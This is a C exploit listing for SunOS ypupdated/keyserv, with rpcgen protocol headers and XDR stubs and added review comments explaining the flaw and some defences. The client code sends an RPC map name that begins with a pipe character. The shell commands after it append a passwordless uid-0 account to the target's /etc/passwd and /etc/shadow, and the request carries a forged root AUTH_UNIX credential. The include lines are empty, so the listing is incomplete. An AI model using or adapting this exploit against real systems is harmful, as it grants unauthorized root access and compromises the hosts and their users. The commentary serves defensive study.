/*update: kcope/year2008/tested on SunOS 5.10// KEYSERV/YPUPDATED (SunOS 4.1.3/RPC SERVICES) If we send an MAP UPDATE to a remote YPUPDATED (via KEYSERV) it executes a shell through which extra commands may be launched on the remote host by passing '|shell command'. i.e. the COMM variable contains a pipe character after which a command may be passed. You may change the command by changing this. */

/*
 * NOTE(review): this page is three files collapsed into one listing:
 *   1. an RPC client (the K&R-style main() below) that issues a single
 *      call to RPC program 100028, procedure 1, on the host named in argv[1];
 *   2. ypupdate_prot.h, the rpcgen-generated protocol header;
 *   3. ypupdate_prot_xdr.c, the rpcgen-generated XDR encode/decode stubs.
 * The #include directives lost their header names during extraction and
 * are left as found; the listing does not compile as-is.
 *
 * Security reading of the client: the only field carrying attacker-chosen
 * content is `mapname`, a string that begins with '|'.  Per the author's
 * note above, the receiving ypupdated hands that string to a shell, so a
 * map name becomes a command -- the classic command-injection pattern of
 * untrusted input reaching a shell unsanitized.  Nothing in the XDR layer
 * filters content: xdr_string() only caps mapname at MAXMAPNAMELEN bytes.
 * The RPC credential is AUTH_UNIX (authunix_create claiming uid 0 / gid 0),
 * a flavour whose identity is asserted by the client and never proven, so
 * it gives the server no real assurance about who is calling.
 *
 * Defensive takeaways: do not run ypupdated where it is not required;
 * never pass a client-supplied map name to a shell -- validate it against
 * an allow-list of known map names; and alert on RPC program 100028
 * traffic from unexpected sources or on map names containing shell
 * metacharacters.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Wire-size limits, duplicated from ypupdate_prot.h below. */
#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255

/* Local copies of the protocol types, matching the rpcgen header below. */
typedef struct{ unsigned int yp_buf_len; char * yp_buf_val; } yp_buf;
struct ypupdate_args{ char * mapname; yp_buf key; yp_buf datum; };
typedef struct ypupdate_args ypupdate_args;

#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#elif __STDC__
extern bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#else
bool_t xdr_ypupdate_args();
#endif

/*
 * Entry point.  argv[1] is the target host name.  Builds one ypupdate_args
 * request whose mapname is the `comm` string and sends it over UDP with an
 * AUTH_UNIX credential; the reply and the clnt_call() status are ignored.
 */
void main(argc, argv)
int argc;
char *argv[];
{
    CLIENT * cli;
    unsigned long prog=100028;        /* == YPU_PROG in ypupdate_prot.h */
    unsigned int vers=1;              /* == YPU_VERS */
    struct sockaddr_in skn;
    struct timeval timeVal;
    struct hostent * hostEnt;
    ypupdate_args ypArg;
    unsigned long rtnval;
    unsigned int desc;
    /* The injected string.  It is sent as the *map name*; the leading '|'
     * is what the remote side (per the author's note) interprets as a
     * pipe to a shell.  Everything after it is shell text, not NIS data. */
    char * comm = "|echo \"r00t::0:0:Super-User die zweite:/:/sbin/sh\" >> /etc/passwd;echo \"r00t::6445::::::\" >> /etc/shadow;";

    if(argc<2) { printf("example: yxp target\n"); exit(1); }

    timeVal.tv_usec=0;
    timeVal.tv_sec=15;                /* 15 s RPC timeout */
    desc=RPC_ANYSOCK;                 /* let clntudp_create open the socket */

    /* key and datum are one-byte placeholders ("x" plus its NUL); the
     * request's payload fields carry nothing meaningful. */
    ypArg.datum.yp_buf_val="x";
    ypArg.datum.yp_buf_len=strlen(ypArg.datum.yp_buf_val)+1;
    ypArg.key.yp_buf_val="x";
    ypArg.key.yp_buf_len=strlen(ypArg.key.yp_buf_val)+1;
    ypArg.mapname=comm;               /* the injection rides in mapname */

    if ((hostEnt=gethostbyname(argv[1]))==NULL){ printf("gethostbyname failure\n"); exit(1); }

    /* Port 0: presumably resolved through the portmapper for program
     * 100028 by clntudp_create.  IPv4 only -- copies the first 4 bytes
     * of h_addr. */
    skn.sin_family=AF_INET;skn.sin_port=htons(0);
    bcopy(hostEnt->h_addr,&skn.sin_addr.s_addr,4);

    if ((cli=clntudp_create(&skn,prog,vers,timeVal,&desc))==NULL){ printf("clntudp_create failure\n"); exit(1); }

    /* AUTH_UNIX credential: machine name "localhost", uid 0, gid 0, no
     * supplementary groups.  These values are simply asserted by the
     * client; the flavour carries no proof, which is why a server must
     * not grant privilege on the strength of them. */
    cli->cl_auth=authunix_create("localhost",0,0,0,0);

    /* Procedure 1 == YPU_CHANGE.  Reply decoded as u_int into rtnval;
     * neither rtnval nor the clnt_call() status is examined. */
    clnt_call(cli,1,xdr_ypupdate_args,&ypArg,xdr_u_int,&rtnval,timeVal);
}

/* ---- file boundary: the label below is a page label, not C ---- */
ypupdate_prot.h:
/*
 * Please do not edit this file.
 * It was generated using rpcgen.
 */
#ifndef _YPUPDATE_PROT_H_RPCGEN
#define _YPUPDATE_PROT_H_RPCGEN

#include

/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */
/*
 * Compiled from ypupdate_prot.x using rpcgen
 * This is NOT source code!
 * DO NOT EDIT THIS FILE!
 */

/* Wire-size caps enforced by the XDR stubs (length only -- the stubs do
 * no content validation, so these are not a defence against injection). */
#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255

/* Variable-length opaque buffer (XDR "opaque<>"). */
typedef struct { u_int yp_buf_len; char *yp_buf_val; } yp_buf;
#ifdef __cplusplus
extern "C" bool_t xdr_yp_buf(XDR *, yp_buf*);
#elif __STDC__
extern bool_t xdr_yp_buf(XDR *, yp_buf*);
#else /* Old Style C */
bool_t xdr_yp_buf();
#endif /* Old Style C */

/* Arguments of CHANGE / INSERT / STORE: map name plus key and datum. */
struct ypupdate_args { char *mapname; yp_buf key; yp_buf datum; };
typedef struct ypupdate_args ypupdate_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR *, ypupdate_args*);
#elif __STDC__
extern bool_t xdr_ypupdate_args(XDR *, ypupdate_args*);
#else /* Old Style C */
bool_t xdr_ypupdate_args();
#endif /* Old Style C */

/* Arguments of DELETE: map name plus key only. */
struct ypdelete_args { char *mapname; yp_buf key; };
typedef struct ypdelete_args ypdelete_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypdelete_args(XDR *, ypdelete_args*);
#elif __STDC__
extern bool_t xdr_ypdelete_args(XDR *, ypdelete_args*);
#else /* Old Style C */
bool_t xdr_ypdelete_args();
#endif /* Old Style C */

/* Program / version numbers.  100028 is what the client above hard-codes
 * in `prog`; procedures 1..4 follow.  These are the values to key on for
 * wire-level detection of update traffic. */
#define YPU_PROG ((u_long)100028)
#define YPU_VERS ((u_long)1)

#ifdef __cplusplus
#define YPU_CHANGE ((u_long)1)
extern "C" u_int * ypu_change_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_INSERT ((u_long)2)
extern "C" u_int * ypu_insert_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_DELETE ((u_long)3)
extern "C" u_int * ypu_delete_1(ypdelete_args *, CLIENT *);
extern "C" u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *);
#define YPU_STORE ((u_long)4)
extern "C" u_int * ypu_store_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);
#elif __STDC__
#define YPU_CHANGE ((u_long)1)
extern u_int * ypu_change_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_INSERT ((u_long)2)
extern u_int * ypu_insert_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_DELETE ((u_long)3)
extern u_int * ypu_delete_1(ypdelete_args *, CLIENT *);
extern u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *);
#define YPU_STORE ((u_long)4)
extern u_int * ypu_store_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);
#else /* Old Style C */
#define YPU_CHANGE ((u_long)1)
extern u_int * ypu_change_1();
extern u_int * ypu_change_1_svc();
#define YPU_INSERT ((u_long)2)
extern u_int * ypu_insert_1();
extern u_int * ypu_insert_1_svc();
#define YPU_DELETE ((u_long)3)
extern u_int * ypu_delete_1();
extern u_int * ypu_delete_1_svc();
#define YPU_STORE ((u_long)4)
extern u_int * ypu_store_1();
extern u_int * ypu_store_1_svc();
#endif /* Old Style C */

#endif /* !_YPUPDATE_PROT_H_RPCGEN */

/* ---- file boundary: the label below is a page label, not C ---- */
ypupdate_prot_xdr.c:
/*
 * Please do not edit this file.
 * It was generated using rpcgen.
 */
#include "ypupdate_prot.h"

/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */
/*
 * Compiled from ypupdate_prot.x using rpcgen
 * This is NOT source code!
 * DO NOT EDIT THIS FILE!
 */

/*
 * XDR a yp_buf as an opaque byte string of at most MAXYPDATALEN bytes.
 * Works in both directions (encode/decode) depending on xdrs->x_op.
 * Returns TRUE on success, FALSE if xdr_bytes() fails (e.g. the length
 * on the wire exceeds the cap).  `buf` is an unused rpcgen artifact.
 */
bool_t
xdr_yp_buf(XDR *xdrs, yp_buf *objp)
{
    register long *buf;

    if (!xdr_bytes(xdrs, (char **)&objp->yp_buf_val, (u_int *)&objp->yp_buf_len, MAXYPDATALEN)) {
        return (FALSE);
    }
    return (TRUE);
}

/*
 * XDR a ypupdate_args: mapname as a NUL-terminated string capped at
 * MAXMAPNAMELEN, then key and datum via xdr_yp_buf().  The cap bounds the
 * *length* only; a map name containing shell metacharacters passes
 * through untouched, so any content validation must happen in the server
 * procedure, not here.  Returns FALSE on the first failing field.
 */
bool_t
xdr_ypupdate_args(XDR *xdrs, ypupdate_args *objp)
{
    register long *buf;

    if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) {
        return (FALSE);
    }
    if (!xdr_yp_buf(xdrs, &objp->key)) {
        return (FALSE);
    }
    if (!xdr_yp_buf(xdrs, &objp->datum)) {
        return (FALSE);
    }
    return (TRUE);
}

/*
 * XDR a ypdelete_args: mapname (capped at MAXMAPNAMELEN) and key.  Same
 * length-only caveat as xdr_ypupdate_args().  Returns FALSE on the first
 * failing field.
 */
bool_t
xdr_ypdelete_args(XDR *xdrs, ypdelete_args *objp)
{
    register long *buf;

    if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) {
        return (FALSE);
    }
    if (!xdr_yp_buf(xdrs, &objp->key)) {
        return (FALSE);
    }
    return (TRUE);
}